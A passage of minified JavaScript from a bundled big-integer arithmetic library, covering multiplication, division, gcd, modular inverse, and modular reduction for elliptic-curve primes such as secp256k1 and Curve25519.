ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ua,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return 